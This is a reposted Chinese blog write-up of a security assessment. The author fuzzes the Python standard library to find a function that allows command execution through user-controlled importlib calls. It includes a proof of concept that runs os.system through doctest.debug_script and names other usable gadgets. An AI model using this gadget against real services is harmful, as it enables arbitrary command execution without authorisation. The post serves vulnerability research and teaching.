Python命令执行的一个Case

最新推荐文章于 2024-07-04 11:59:03 发布
最新推荐文章于 2024-07-04 11:59:03 发布
阅读量292 收藏
点赞数
分类专栏: python 文章标签: python linux 编程语言 go tensorflow
原文链接:http://www.leveryd.top/2020-12-23-Python命令执行Case/
版权

本文的文字及图片来源于网络,仅供学习、交流使用,不具有任何商业用途,,版权归原作者所有,如有问题请及时联系我们以作处理

作者:leveryd

想要获取更多Python学习资料,了解更多关于Python的知识,可以加Q群630390733踊跃发言,大家一起来学习讨论吧!

在一次安全评估过程中,遇到了一个命令执行的点,但是存在部分限制。

服务是用Python写的,漏洞点的代码精简一下大概如下

import importlib


class AnyClass(object):
    pass


user_input_module = ""   # 用户可控
user_input_function = ""  # 用户可控
user_input_argument = ""  # 用户可控
imp_module = importlib.import_module(user_input_module)
func = getattr(imp_module, user_input_function)

arg =  bytes(user_input_argument.encode("utf-8"))
func(arg, AnyClass())   # 第二个参数必须存在

大概就是 任意模块.任意函数(任意字符串,不可控的实例参数)

因为第二个参数必须存在,所以不能简单的调用 os.system 函数来执行命令。

我的想法就变成,怎么找到一个方法能够执行命令,且这个方法有两个参数,且第二个参数不影响命令执行。

解题过程

想到去遍历Python库,来看看有没有满足上述条件的方法。

于是写了一小段代码来遍历Python默认安装的所有模块,扔给指定参数来尝试调用模块中的方法。如果没有报错,就打印函数后人工排查一下。

# coding:utf-8
import os
import re
import importlib


class AnyClass(object):
    pass


def fuzz_object(o):
    """
    :param o:
    :return:
    """
    for k in o.__dict__:  
        # print(k)
        v = o.__dict__[k]
        if callable(v):   # 遍历模块所有的函数
            try:
                v(b"xxxx", AnyClass())   # 如果函数接受两个参数,且第一个参数是bytes类型,第二个参数可以是任意实例,就把函数名打印出来。
                print(o.__file__, k)
            except Exception as _:
                pass


if __name__ == "__main__":
    abs_path = "/usr/local/Cellar/python/3.7.7/Frameworks/Python.framework/Versions/3.7/lib/python3.7"
    for i in os.listdir(abs_path):  # 遍历Python自带的基础库
        if os.path.isfile(abs_path + "/" + i):
            imp_module = re.sub(r'\.py$', "", i)
            try:
                ip_module = importlib.import_module(imp_module)

                fuzz_object(ip_module)
            except Exception as _:
                print(_)
            except KeyboardInterrupt:
                pass
        elif i not in [".", ".."]:  # 这里就不处理目录了
            pass

结果测出很多函数都可以正常运行,没有报错。

先说最终结论, doctest.debug_script 函数完全满足要求

测试一下

import importlib


class AnyClass(object):
    pass


user_input_module = "doctest"
user_input_function = "debug_script"
user_input_argument = "import os;os.system('touch /tmp/qwer')"  # 执行 touch /tmp/qwer
imp_module = importlib.import_module(user_input_module)
func = getattr(imp_module, user_input_function)

arg =  bytes(user_input_argument.encode("utf-8"))
func(arg, AnyClass())

测试过程中,也发现有很多其他的部分满足需求的函数,这里也一并记录。

os.getenvb  可以读环境变量

eval(xx,{}) 可以命令执行,但是需要第二个参数是dict

pickletools.dis  输出opcode

webbrowser.open("http://www.baidu.com",object)

./idlelib/calltip.get_entity

timeit.timeit()  符合要求

os.fwalk

doctest.debug_script  完全符合要求,可以用来命令执行

总结

寻找满足特定条件的X时,用遍历的思想让程序去找,总会有点收获。

在另外一次针对bash脚本代码审计时也用到了这个简单但有效果的方法,找到了突破点。后面会写一篇介绍 :)

pythonputao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
高效使用 Python 字典的清单
qq_37101453的博客
05-03 592
字典(dict)对象是 Python 最常用的数据结构,社区曾有人开玩笑地说:"Python企图用字典装载整个世界",字典在Python中的重要性不言而喻,这里整理了几个关于高效使用字典的清单,希望Python开发者可以在日常应用开发中合理利用,让代码更加 Pythonic。1、用 in 关键字检查 key 是否存在Python之禅中有一条开发哲学是:There should be one-- a...
python case_Python Switch Case 最佳实践
weixin_39918043的博客
12-03 168
优美胜于丑陋import this前言表驱动法是一种编辑模式( Scheme )——从表里面查找信息而不使用逻辑语句(if 和 case)。事实上,凡是能通过逻辑语句来选择的事物,都可以通过查表来选择。对简单的情况而言,使用逻辑语句更为容易和直白。但随着逻辑链的越来越复杂,查表法也就愈发显得更具吸引力。Python 的switch case由于 Python 中没有switch case关键词,所...
python case 语句
最新发布
2401_85969209的博客
07-04 492
语句的等价物)为程序员提供了一种更简洁、更直观的条件判断方式。它使用模式匹配的方式进行条件判断,使得代码更加简洁明了、易于扩展和维护。语句,为Python程序员提供了一种更简洁、更直观的条件判断方式。语句是Python 3.10引入的一种新特性,它使用模式匹配来执行条件判断。语句的功能和特性也将不断完善和扩展,为Python程序员带来更多的便利和可能性。在Python编程语言的发展历程中,对于条件判断的需求一直存在。子句中的模式,直到找到匹配的模式并执行相应的代码块。语句的等价物)及其在实际编程中的应用。
python执行多个py文件下的case
qq_37605109的博客
12-09 823
py文件的case样式,及执行用例的写法,参照附件 这个是执行多条case的脚本 import unittest test_case=unittest.defaultTestLoader.discover('case','*.py')#这个是通过正则拿到case文件夹下边所有的已.py结尾的文件 runner=unittest.TextTestRunner() runner.run(test_case)#这个是运行所有用例的 ...
python在类中实现swith case功能
weixin_34062469的博客
03-15 174
2019独角兽企业重金招聘Python工程师标准>>> ...
python怎样执行curl命令_如何使用python执行curl命令
weixin_30995917的博客
12-23 1万+
如何使用python执行curl命令我想在python执行curl命令。通常,我只需要在终端输入命令并按回车键。 但是,我不知道它在python中是如何工作的。该命令如下所示:curl -d @request.json --header "Content-Type: application/json" https://www.googleapis.com/qpxExpress/v1/trips/...
写个python+selenium 的自动化测试批量执行多个测试case文件用例截屏
sunshineko的专栏
09-03 6168
最近一直面试换工作,闲来无聊写写。 思路: 1、查找目标目录下的以test* 为开头的case文件 2、通过run_all_case.py 来执行全部测试用例 3、每一个用例执行完成后截屏一个图片文件保存在文件夹中 具体实现,多个测试用例文件,举例:login,personal(登录case,和 登录后进入个人中心) 新建三个文件分别为:test_login_case.py    te...
python命令输入if_SPSS中Recode、Compute、Count、If命令
weixin_35886741的博客
02-10 1751
在进行统计分析时,经常需要对某些数据进行重新处理,如年龄、身高、收入等,了解他们的分布或进行分析。1、SPSS的数据变换,主要命令有四种:2、Recode 命令:重新编码数据,重新安排数据3、Compute命令:对原始数据进行四则运算或指数运算等,派生出新的变量4、Count命令:创建一个新变量来计算某些变量值所出现的次数5、If命令:如果表达式成立,则创建一个新变量一.Recode 命令对数据重...
python返回到上一个判断条件_Python中的条件判断语句与循环语句用法小结
weixin_39919195的博客
12-08 756
if语句>>通用格式if语句一般形式如下:if :elif :else:另外需要注意的是,Python中是没有switch/case语句的while循环while语句是Python语言中最通用的迭代结构,简而言之,只要顶端测试一直计算到真值,就会重复执行一个语句块。>>一般格式while :else:>>break,continue,pass和循环elsebre...
100天精通Python丨基础知识篇 —— 06、一千个程序员有一千套编码规范
热门推荐
独木不成林,单弦不成音。
07-02 16万+
一千个读者有一千个哈姆莱特。 -- 莎士比亚 一千个程序员有一千套编码规范。 -- 不吃西红柿
Python操作Windows窗口的库
06-21
windows窗口各种GUI不同控制类型可用的方法
Python Switch Case三种实现方法代码实例
12-17
Python没有switch语句,只能通过模拟来对应实现: 方法一:使用dictionary **values = { value1: do_some_stuff1, value2: do_some_stuff2, … valueN: do_some_stuffN, } values.get(var, do_default_stuff)() 根据需求可以自行更改参数内容,灵活运用 def add(x,y): print x+y def minus(x,y): print x-y def multiply(x,y): print x*y def div(x,y): pri
一个python_ UI case
weixin_33698043的博客
09-18 127
2019独角兽企业重金招聘Python工程师标准>>> ...
pythoncase的用法_用 Python 实现简单的 switch/case 语句
weixin_39928648的博客
12-03 6889
Python中是没有Switch / Case语句的,很多人认为这种语句不够优雅灵活,在Python中用字典来处理多条件匹配问题字典会更简单高效,对于有一定经验的Python玩家不得不承认,的确如此。但今天我们还是来看看如果一定要用Python来Switch / Case,可以怎么玩。语法约束我们先定义一下Switch/Case应该怎么表达,为了简单我们可以让它长成这样。def cn():pri...
python中swith-case,pythoncase写法
chatgpt001的博客
09-17 4029
大家好,小编来为大家解答以下问题,python中swith-casepythoncase写法,今天让我们一起来看看吧!
python中match/case & 析构
asunshineboy的博客
09-12 1125
match/case、序列模式匹配 、映射模式匹配、 析构
pyThon 笔记2:switch case
bigSun2017的博客
06-20 864
python 中不支持switch...case, do....while之类的语句
Python 实现简单的 switch/case 语句
weixin_34132768的博客
09-16 2708
Python中是没有Switch / Case语句的,很多人认为这种语句不够优雅灵活,在Python中用字典来处理多条件匹配问题字典会更简单高效,对于有一定经验的Python玩家不得不承认,的确如此。 但今天我们还是来看看如果一定要用Python来Switch / Case,可以怎么玩。 语法约束 我们先定义一下Switch/Case应...
Python搭建一个测试框架
07-11
要搭建一个测试框架,你可以使用Python中的一些测试框架库,如unittest、pytest或nose等。下面以unittest为例,提供一个简单的测试框架搭建示例: 1. 创建一个新的Python文件,命名为`test_framework.py`。 2. 导入`unittest`模块。 ```python import unittest ``` 3. 创建一个测试类,继承自`unittest.TestCase`。 ```python class MyTest(unittest.TestCase): def test_case1(self): # 编写测试用例1的代码 self.assertEqual(2 + 2, 4) # 断言示例 def test_case2(self): # 编写测试用例2的代码 self.assertTrue('foo'.isupper()) # 断言示例 ``` 4. 添加一个主函数,用于执行测试。 ```python if __name__ == '__main__': unittest.main() ``` 5. 运行测试框架。 在命令行中执行以下命令: ``` python test_framework.py ``` 上述示例中,我们创建了一个名为`MyTest`的测试类,其中包含两个测试用例`test_case1`和`test_case2`。在每个测试用例中,我们可以编写具体的测试代码,并使用断言来验证预期结果与实际结果是否一致。 你可以根据实际需求,在测试类中添加更多的测试用例和断言。使用这种方式,你可以搭建一个简单的测试框架来组织和运行你的测试代码。同时,你还可以探索其他测试框架库,以便根据你的需求选择最适合的框架。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值